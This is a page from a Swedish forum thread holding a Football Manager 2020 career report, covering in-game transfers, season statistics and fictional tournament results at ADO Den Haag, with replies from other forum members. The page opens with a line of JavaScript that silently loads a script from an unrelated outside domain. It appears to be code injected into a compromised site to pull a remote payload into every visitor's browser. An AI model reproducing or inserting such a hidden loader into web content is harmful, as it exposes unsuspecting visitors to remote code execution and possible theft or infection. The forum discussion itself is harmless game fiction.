;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM20] Livet efter Markus Rosenberg – Sida 4 – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[Stängt] [FM20] Livet efter Markus Rosenberg

110 Inlägg
23 Users
344 Reactions
7,507 Visningar
Jimpacool
(@jimpacool)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 17
 

Imponerande bedrift med MFF och kul steg med att gå till Holländska ligan. 


   
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

Härligt att saven och rapporten lever vidare!

"I have never played for a draw in my life." - Sir Alex Ferguson


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Det blev en otroligt hetsig och intensiv första vecka i Holland och Den Haag. Inte nog med att truppen var obalanserad så var den inte särskilt bred heller. En transferbudget på lite över 40 miljoner kronor gav ett visst lugn men samtidigt så är det en klubb i botten av Eredivisie vilket innebär att det är en av de nedre hyllorna vi får jobba med. Där fann vi dock tre spelare som vi tycker breddar truppen i ett viktigt skede och det handlar om mittbackarna Micky van der Veen och Jan Paul van Hecke men även den före detta norska anfallstalangen Mustapha Fofana som inte riktigt fått den utveckling man hoppats på, vilket vi arbetar för att nå i Den Haag såklart. Tre miljoner kronor betalade vi för dessa tre herrar.

IN
mb :: Micky van der Veen :: 1,8M :: Volendam
mb :: Jan Paul van Hecke :: 0,8M :: NAC Breda
fw :: Mustapha Fofana :: 0,4M :: Strömsgodset

UT
fw :: Kees Visser :: 20M :: Feyenoord
mål :: Hugo Wentges :: 2,5M :: Den Bosch

Två spelare lämnade dessutom, även om vi hoppats på cirka tio stycken då reservlaget har en del spelare över 20 år som inte alls har varken nuvarande förmåga eller framtida potential att ens vara i närheten av A-laget. Gällande Kees Visser så hade han visserligen en spännande potential men sett till hur vi vill att en anfallare ska vara så passar han inte alls in där. Hugo Wentges är en fin målvakt med potential men det finns samtidigt en uttalad förstamålvakt och Hugo kamperade med några år äldre Meulenhof samtidigt som vi har en supertalang tillika Elroy Boel, 16 år, underifrån. Det ger oss en ekonomisk stabilitet efter detta fönstret som på sikt kan ge oss intressanta spelare eller uppgraderingar av faciliteter.

En match hann vi med under januarifönstret och det borta mot ett annat bottenlag, nämligen Heracles, som även de bytte tränare i samma veva. Matchen slutade 0-0 och var jämn på alla håll och kanter vilket inte gav oss särskilt mycket; det hände knappt något helt enkelt. Rent krasst så har vi en superspelare att luta oss tillbaka mot. Mittbacken Stefan Wolf, endast 22 år gammal, ser helt outstanding ut och hade lätt kunnat spela i en av de större europeiska klubbarna, om än som rotationsspelare i nuläget. Tyvärr är Stefan missnöjd då han helt naturligt vill lämna för en större klubb men eftersom ingen har visat intresse så är vi i stiltje. Förhoppningsvis känner han att med JDT’s ankomst kan klubben växa ett par nivåer.

Stefan Wolf :: Micky van der Veen :: Jan Paul van Hecke :: Mustapha Fofana


   
Micke reacted
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Första säsongen i den holländska klubben ADO Den Haag är klar och även om vi kom in i mitten av säsongen så har JDT redan hunnit göra skillnad. Från att ligga näst sist i Eredivisie tog han upp och befäste Den Haag på säker mark, med andra ord spelar man i den högsta divisionen även nästa säsong vilket var det enda målet styrelsen satt upp för vår huvudman. Med andra ord hann vi med 14 matcher där vi vann fem, spelade oavgjort fyra och förlorade fem stycken och för ett bottenlag som tog poäng över flera topplag, däribland titelvinnaren Ajax, så måste det ses som en väl godkänd insats.

Nedanstående statistik är vad spelarna imponerade med över en hel säsong och det är här vi börjar förstå vad det är som försiggår i klubben; spelarna har fruktansvärt svårt att göra mål. Under de 14 matcher jag hade hand om laget gjorde vi 14 mål vilket är i snitt ett mål per match. Innan dess hade man gjort tolv mål på 20 matcher och totalt gjorde Den Haag 26 mål vilket var sämst i Eredivisie. Det innebär således att vi har hittat problemet och eftersom styrelsen vill att vi ska spela en underhållande fotboll så kommer jag gå in med filosofin att så länge vi gör ett mål mer än motståndarna så är vi nöjda vilket då innebär att det mycket väl kan bli allt från 1-0 till 8-7 till oss.

Flest mål :: Mauro Trujillo :: 5 st
Flest assist :: Daniël van Kaam :: 4 st
Högst snittbetyg :: Mauro Trujillo :: 7,05

Kort efter säsongen var slut inleddes förhandlingar; klubben var under ett övertagande utan att jag visste om att det ens fanns intressenter eller att nuvarande ägarna var intresserade av att sälja båten. Det var ett konsortium innehållandes svenskar som tog över och genast hände det grejer. Träningsanläggningen och dataanalyseringen ska uppgraderas, ungdomsrekryteringen ska förbättras och en helt ny arena ska byggas som kommer att ta 24 471 i kapacitet, nästan dubbelt så mycket som den nuvarande på 15 000 och som för den delen byggdes så sent som 2007. Utöver det gick den svenska styrelsen in och gjorde klart med två spelare utan att jag hade något att säga till om. Det ska onekligen bli intressant att se om jag ens kommer att få ta ut matchtruppen nästa säsong. Inga pengar pumpades in utan nu har vi flera miljoner i skulder och som direkt påbörjades att betalas av.


   
Andreas_N, raca14, Prev and 1 people reacted
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Eftersom vi har gått från höst-vår till vår-höst och har hoppat från en klubb till en annan så får vi räkna om säsongerna lite. Jag var i Malmö FF i fem och en halv säsong men sett till passerade säsonger är vi nu inne på säsong åtta om vi räknar från start. Å andra sidan är det här min första säsong från start i ADO Den Haag men den benämns även som 2026/27. Efter att klubben fått en ny styrelse som direkt gick in och gjorde stora förändringar med såväl faciliteter, arena och dessutom värvade två spelare så hände ytterligare en värvning från deras sida innan JDT fick ta över ansvaret.

Att hitta en balans mellan kvalitativa spelare och ekonomi är inte alltid enkelt utan här fick vi verkligen välja med omsorg, i synnerhet efter styrelsens köp-raid där tre spelare köptes för sammanlagt 77 miljoner kronor och en spelare sedan tidigare blev klar efter att ha spelat x antal matcher som utlånad till vår klubb uppgick summan till hela 108 miljoner kronor. Dock var det ytterbackspositionerna de enda som verkligen behövde förstärkas vilket vi fann i två svenska ansikten; högerbacken David Ngoma och vänsterbacken Samuel Ohlsson för 2,5 respektive 1,8 miljoner vilket är helt andra siffror än de andra värvningarna.

IN
omh :: Mauro Trujillo :: 31M :: Willem II
cm :: Alex Lowry :: 18M :: Rangers
cm :: Oscar Paz :: 45M :: Atl. Tucumán
dm :: Jhon Díaz :: 14M :: Atl. Nacional
hb :: David Ngoma :: 2,5M :: Watford
vb :: Samuel Ohlsson :: 1,8M :: AIK

UT
mb :: Julius Dirksen :: 2,5M :: Eindhoven
+24 spelare på en fri transfer

Sett till siffror gör vi ett ekonomiskt dåligt fönster men här handlade det om att rensa ut överflödiga spelare och försöka bygga en god grund att jobba vidare med samtidigt som styrelsen tyckte sig behöva visa sina muskler och ta in tre dyra spelare. I nuläget har vi totalt 28 spelare i truppen fördelat på en startelva, en backupspelare på varje position samt sex högintressanta talanger, däribland en svensk talang från de egna leden. Vi lyckades dessutom skriva ett långtidskontrakt med vår supermittback Stefan Wolf så förutsättningarna för framtiden ser helt plötsligt otroligt ljus ut. Utöver detta så lade vi stor vikt vid att ta in kompetent personal till klubben och samtliga ledarstaber håller en oerhört hög nivå sett till de andra lagen i Eredivisie.

Alex Lorwy :: Oscar Paz :: Jhon Díaz


   
Micke reacted
Andreas_N
(@andreas_n)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 38
 

@daniel-nilsson

Jäklar vilken skön twist med svenska ägare ?


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Efter knappt ett år, rättare sagt elva månader, så har JDT tillsammans med de nya ägarna fört klubben från botten till toppen vilket naturligtvis låter som en saga utan dess like. Samtidigt känns det för bra för att vara sant och den där riktigt jobbiga formsvackan som förr eller senare brukar smyga på en inväntas fortfarande. Spontant känns det som att motståndarna underskattar oss något enormt vilket vi såklart utnyttjar. Nu väntar ett januarifönster där vi dessutom planerar att vara aktiva i för att ta in ordentliga försvarsspelare till skillnad från panikvärvningarna för ett år sedan.

20 matcher har spelats i Eredivisie och även om vi har spelat både en och två matcher fler än en handfull lag så ligger vi trots allt på andra plats, bland annat framför Ajax som innan den här säsongen vunnit ligan åtta säsonger på raken. Vår taktik går i grunden ut på att nyttja snabba omställningar vilket har gett fina ytor åt yttermittfältarna där centralmittfältarna och anfallarna har bidragit offensivt också, såväl som ytterbackarna. 33 mål framåt och 16 mål bakåt är dessutom ett bra kvitto eftersom vi rent kvalitativt ska placera oss som ett mittenlag.

Flest mål :: Zakaria Aboukhlal :: 8 st
Flest assist :: Pharell de Macker :: 3 st
Högst snittbetyg :: Pharell de Macker :: 7,46

Som jag skrev om i förra stycket så har vi verkligen kunnat nyttja kompetensen rent poängmässigt hos yttermittfältarna och det i synnerhet hos Zarakia Abkouhlal och Pharell de Macker. De har gjort flest mål, assist och har högst snittbetyg i laget och sett till hur det ser ut i Eredivisie så har Antony i Ajax gjort tio mål, en handfull spelare gjort sju assist var och Sorin Cordea i PSV har högst snittbetyg på 7,65 där Pharell faktiskt ligger på andra plats. Utöver det vill jag ge hedersomnämnanden till samtliga sex juniorspelare som, när de väl fått chansen, verkligen visat framfötter och tagit för sig. Framtiden ser med andra ord ljus ut.


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Redan innan januarifönstret togs vid skedde en övergång vilket på ett sätt rörde till det något men samtidigt inte, mer om det senare. Hur som helst så ville jag verkligen få in mer kvalitet i backlinjen och jobbade hårt på att hitta pusselbitarna. 20,5 miljoner senare stod vi med två nya mittbackar som båda presenterades samma dag, den tolfte januari. Tijs Velthuis kontrakt höll på att löpa ut med PSV löstes sedermera för 4,5 miljoner, ett perfekt backupalternativ till superstjärnan Wolfs. Till höger mittbacksposition ville jag ha in en ordinarie spelare och fann till slut det i Lilleströms Erik Tobias Sandberg som köptes för 16 miljoner och är en spelare som direkt kommer att kunna hävda sig i Eredivise. I slutet av övergångsfönstret gjorde vi även klart med ett framtidsnamn i högerbacken Joey van der Heijden som anslöst från Den Bosch för hela 23 miljoner kronor; ett högt pris dock men vi får samtidigt in en spelare som på sikt kommer att utvecklas till en potentiell landslagsspelare.

IN
mb :: Tijs Velthuis :: 4,5M :: PSV
mb :: Erik T. Sandberg :: 16M :: Lilleström
hb :: Joey v.d. Heijden :: 23M :: Den Bosch

UT
cm :: Kevin Strootman :: 3M :: Astana
mb :: Emre Ates :: 1M :: Twente
mb :: Micky v.d. Ven :: Fri Transfer :: TOP Oss

Vi är i ett läge där vi kommer att gå minus på övergångsmarknaden eftersom spelarna vi säljer inte håller en ordinarie nivå ens för ett mittenlag. Som jag nämnde i början av den här rapporten försvann en spelare och det redan i början av december. Den rutinerade mittfältaren Kevin Strootman fick nog av att sitta på bänken och ville lämna. Med sina 36 år i bagaget och ett utgående kontrakt samtidigt som en supertalang knackade på dörren ställde jag mig inte i vägen för detta och han lämnade till slut för Astana. Mittbackarna Ates och Ven lämnade för en struntsumma samt på en fri transfer och det känns bra då vi frigjorde utrymme i lönebudgeten för att ta in de rapporterade nyförvärven.

Tijs Velthuis :: Erik T. Sandberg :: Joey v.d. Heijden


   
Kristijan and Micke reacted
Imonsh
(@imonsh)
Active Member
Blev medlem: 4 år sedan
Inlägg: 17
 

Mycket rolig och intressant rapport detta. Har efter ett tag äntligen läst ikapp alla uppdateringar 🙂

 

Har några saker jag är nyfiken på: hur ser det svenska landslaget ut numera? Vilka lag har vunnit CL och de stora mästerskapen (EM, VM)? Vilka spelare har tagit hem Ballon D'Or? 🙂


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

@imonsh

Sverige, senaste laguppställningen(4-4-2): Dahlberg - Bergmark, Lindelöf, Ahmedhodzic, Kalley - Nanasi, Gigovic, Kulusevski, Fröling - Isak, Wiedesheim-Paul.

Aktiva spelare med över 50 landskamper för Sverige; Lindelöf(123), Augustinsson(100), Isak(92), Kulusevski(84), Dahlberg(81), Claesson(80), K.Olsson(69), Svanberg(65), Fröling(65), Quaison(59), Gyökeres(56), Irandust(54) och Olsen(51).

CL-vinnare;
19/20 :: At. Madrid (över Barcelona)
20/21 :: Juventus (över Real Madrid)
21/22 :: Man City (över PSG)
22/23 :: Liverpool (över Chelsea)
23/24 :: Man City (över Bayern)
24/25 :: Real Madrid (över Tottenham)
25/26 :: PSG (över Man City)
26/27 :: Liverpool (Bayern)

EM/VM-vinnare;
2020 - EM :: Italien (över Holland) :: Sverige åkte ut mot Holland i andra omgången.
2022 - VM :: Brasilien (över Spanien) :: Sverige kom trea efter att ha slagit Tyskland i bronsmatchen.
2024 - EM :: Holland (över Tyskland) :: Sverige åkte ut mot Italien i andra omgången.
2026 - VM :: Italien (över Holland) :: Sverige åkte ut mot Australien i andra omgången.

Ballon d'OR + Guldpojke;
19/20 :: Cristiano Ronaldo (Juventus) + Erling Håland (Dortmund)
20/21 :: Cristiano Ronaldo (Juventus) + Víctor Mollejo (At. Madrid)
21/22 :: Bernardo Silva (Real Madrid) + Fábio Silva (Man City)
22/23 :: Fábio Silva (Man City) + Ilaix Moriba (Barcelona)
23/24 :: Fábio Silva (Man City) + Regen (Bayern)
24/25 :: Erling Håland (Barcelona) + Regen (Bayern)
25/26 :: Odsonne Edouard (Liverpool) + Regen (Lazio)


   
Prev, Marsun19, Andreas_N and 1 people reacted
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Vårsäsongen var en sämre period än höstsäsongen men sett till sin helhet så genomför vi en fantastisk bedrift där vi inför säsongen var rankade att hamna på tionde plats av 18 lag, ett stabilt mittenlag med andra ord. Men så lyckades vi sätta en form direkt och krigade helhjärtat mot såväl sämre som bättre lag vilket gav oss betydligt fler poäng än vad vi ens kunnat drömma om. 34 matcher innebar 17 vinster, tolv oavgjorda, fem förluster och totalt 63 poäng vilket tog oss till en fjärde plats i Eredivisie och spel i UECL(UEFA Europe Conference League) nästa säsong.

Av de 48 gjorda målen stod anfallaren Mustapha Fofana för flest, nämligen tolv stycken och bakom honom på tio mål hittar vi yttern Zakaria Aboukhlal. Oscar Paz och Pharrell de Macker gjorde flest assist vilket var sex respektive fem stycken. Just Oscar Paz tillsammans med Stefan Wolf och Pharrell de Macker hamnade på topp 20-listan över högst snittbetyg. Vi släppte in en hel del mål dessutom, 31 stycken, men vår filosofi om att spela en underhållande fotboll och därigenom alltid sträva efter att göra fler mål än motståndarna även om det skulle innebära en 5-4 vinst.

Flest mål :: Mustapha Fofana :: 12 st
Flest assist :: Oscar Paz :: 6 st
Högst snittbetyg :: Oscar Paz :: 7,32

Ekonomin är allt annat än bra. Redan i mars månad började det eka tomt och ett minustecken framför en siffra som blev allt större för var vecka som gick gjorde att det kändes lite olustigt. Med nästan 100 miljoner in på kontot tack vare tabellplacering gav oss en liten känsla av lugn men samtidigt klargjorde styrelsen att den tilltänkta uppgraderingen av träningsfaciliteterna avbröts på grund av ekonomin. Var det svenska övertagandet ett storhetsvansinne, måntro? Tiden får utvisa men klart är i var fall att såväl uppgraderingen av ungdomsfaciliteterna som nya arenan fortfarande är under kontroll gör att det inte känns alltför kaosartat, än.


   
Micke reacted
Flourix
(@flourix)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 54
 

Spännande att med JDT följde ett svenskt konsortium 🙂 Kanske tar ni hela Europa med storm, igen! 


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Vi både ville och behövde växla upp en nivå eftersom vi dels överpresterade förra säsongen och dels kommer att spela UECL den kommande säsongen och därmed behöver höja kvaliteten i truppen. Mitt i all transferyra börjar rykten florera rätt så kraftigt om att det är nya ägare på väg in vilket var rent ut sagt chockerande. Vid två tillfällen nekade den nuvarande svenska styrelsen maktskiftet men samtidigt så har undertecknad redan från början varit lite misstänksam mot deras övertagande. Vi kan säkerligen vänta oss flera rykten under såväl höst som vår.

Som sagt så behövde vi en kvalitetshöjning och samtidigt en viss föryngring vilket vi fann i nedanstående spelare. JDT vill bygga en mix av spelare sett till både ålder, bakgrund och kvalitet för att kunna bryta upp matcher med olika alternativ. Ynglingarna Michel och Picard rekommenderades starkt av rekryteringsgruppen och hämtades tidigt in och kommer dessutom att få träna med A-laget direkt. Den brasilianske mittbackstalangen Glaucinho hade en friköpsklausul för utländska klubbar på 630 000 kronor vilket är oerhört lågt och en möjlighet det verkligen inte går att förbise. Innermittfältarna Kurez och Ivan besitter båda lite olika kvaliteter och kommer att få skifta och konkurrera på lika villkor.

IN
mål :: Ryan Michel :: 0,2M :: USBCO
cm :: Franck Picard :: 0,2M :: Tours
mb :: Glaucinho :: 0,6M :: Vasco da Gama
cm :: Gorazd Kurez :: 7M :: Domzale
cm :: José Ivan :: 12M :: Ferencváros

UT
mb :: Jan Paul van Hecke :: 5M :: Emmen
omh :: Mauro Trujillo :: 50M :: Excelsior
mål :: Mike van de Meulenhof :: 2M :: N.E.C.
cm :: Daniël van Kaam :: 16M :: Excelsior
hb :: David Ngoma :: 95M :: Utrecht
fw :: Tiago Cukur :: Fri Transfer :: -

Hecke, Meulenhof och Kaam var inte önskvärda i klubben längre utan ansågs överflödiga nu när det var dags att ta nästa steg och alla lämnade för mindre summor. Tiago Cukurs kontrakt löpte ut och fick inte förlängt av samma anledning. Mauro Trujillo var länge med i beräkningarna om den kommande säsongen men när Excelsior kom in med ett 50-miljonersbud godtog vi det eftersom vi har spelare bakom som ser mycket spännande ut. I slutskedet av transferfönstret dök Utrecht upp med ett förhandlingsbart bud på svenska Ngoma som är backup på högerbacken. 95 miljoner för en rotationsspelare är något man omöjligen kan säga nej till.

Glaucinho :: Gorazd Kurez :: José Ivan


   
Andreas_N, Micke, Flourix and 1 people reacted
Flourix
(@flourix)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 54
 

Oj ser man på, det är eftertraktat att äga Ado! 


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  
Postad av: @flourix

Oj ser man på, det är eftertraktat att äga Ado! 

Ja verkligen! Dock känns det lite mysko alltsammans gällande de svenska ägarna; gå all in på värvningar och uppgradering av faciliteter plus en ny arena när man samtidigt inte pumpar in pengar. Jag har fått sälja av och samtidigt varit återhållsam i värvningarna..


   
Jimpacool
(@jimpacool)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 17
 

Fin uppryckning i Holland. Hur har det gått för MFF och allsvenskan sedan JDT stack därifrån?


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  
Postad av: @jimpacool

Fin uppryckning i Holland. Hur har det gått för MFF och allsvenskan sedan JDT stack därifrån?

Som vanligt misshandlas klubben man lämnar i form av konstiga/billiga spelarförsäljningar och otroligt dyra spelarförvärv vilket leder till att klubbarna bakom "hinner ifatt" relativt snabbt igen. AIK vann säsongen efter JDT lämnade men man återtog titeln säsongen därefter. Malmö har bytt tränare vid två tillfällen och nu är Mauricio Pochettino manager!


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Det ser varken bättre eller sämre ut vid en första anblick men börjar vi se över själva prestationer så tycker jag ändå att det i sin helhet faktiskt ser sämre ut, även om det inte är en alltför stor försämring. Vi tar dock våra poäng och är trots allt med i kampen om spel ute i Europa men någonstans så känns Den Haag som en klubb som inte riktigt kan hitta sin identitet och med det sagt så känns det som om samarbetet med JDT löper mot sitt slut då kontraktet trots allt tar slut efter den här säsongen. Dock finns det stor potential i klubben sett till faciliteter och spelarmaterial men någonstans så kniper det.

Vårt absolut största problem är fortsatt att göra mål och det har rent ut sagt varit en stor besvikelse. 24 gjorda och 21 insläppta mål på 19 matcher är inget att skryta om men samtidigt så lyckas vi ändå med vårt grundmål - att göra fler mål än motståndarna, även om det inte sker på daglig basis. I UECL gick vi till slut vidare efter en fin andraplats bakom Sporting och framför Kalmar och Osijek. I första utslagsrundan ställs vi mot Besiktas som mycket väl kan resultera i både vinst och förlust.

Flest mål :: Mustapha Fofana :: 5 st
Flest assist :: Oscar Paz :: 3 st
Högst snittbetyg :: Oscar Paz :: 7,29

Individuellt har vi heller inget direkt att skryta med, möjligtvis Oscar Paz snittbetyg som är Eredivisies åttonde bästa. I övrigt har Fofana inte riktigt fått igång målskyttet som förra säsongen och ingen spelare verkar ta chansen när det väl ges vilket har resulterat i en konkurrens som inte ser motiverad ut. Med det sagt så finner vi heller ingen spelare som har stuckit ut extra utan vi försöker ta nya tag till vårens bravader istället.


   
Flourix and Micke reacted
Flourix
(@flourix)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 54
 

Heerenveen ska inte ligga där dom ligger - om JDT lämnar Haag håller jag en tumme för att rättvisa skipas i Heerenveen istället för Haag. 


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Då JDT är osäker på sin framtid i klubben lade han heller inte allt för stor energi på januarifönstret utan ville ta det lugnt då hans potentiella efterträdare i så fall kommer kunna bygga enligt dennes taktik och filosofi. Men en förändring behövdes göras omedelbart. Ordinarie vänsteryttermittfältaren Zakaria Aboukhlal har inte alls fått till det utan underpresterar konstant och spelarna bakom är inte riktigt redo för en plats i startelvan. Zakaria såldes till Djurgården för tio miljoner kronor vilket är en bra deal för samtliga parter. Utöver det så råkade undertecknad sälja en talang för betydligt mindre pengar än vad vi ville ha helt enkelt på grund av att jag var för snabb med handen i förhandlingarna och inte dubbelkollade.

IN
omv :: Peter Brouwer :: 30M :: Feyenoord

UT
omv :: Zakaria Aboukhlal :: 10M :: Djurgården
omv :: Henrico Potkamp :: 0,9M :: Willem II

Samtidigt som Aboukhlal lämnade hämtades ersättaren in vilket var Feyenoords Peter Brouwer, en 25-årig kompetent ytter som något förvånande var transferlistad för 30 miljoner. För vår del kändes det som ett gudaskänk från ovan eftersom han passar perfekt in i vår startelva och dessutom är en-två nivåer bättre än sin föregångare Zakaria. 30 miljoner är visserligen en hel del men samtidigt är det en investering både i nuet men även för framtiden och en spelare som enligt scoutrapporter kommer att utvecklas ytterligare.

Peter Brouwer


   
Sida 4 / 6
Share: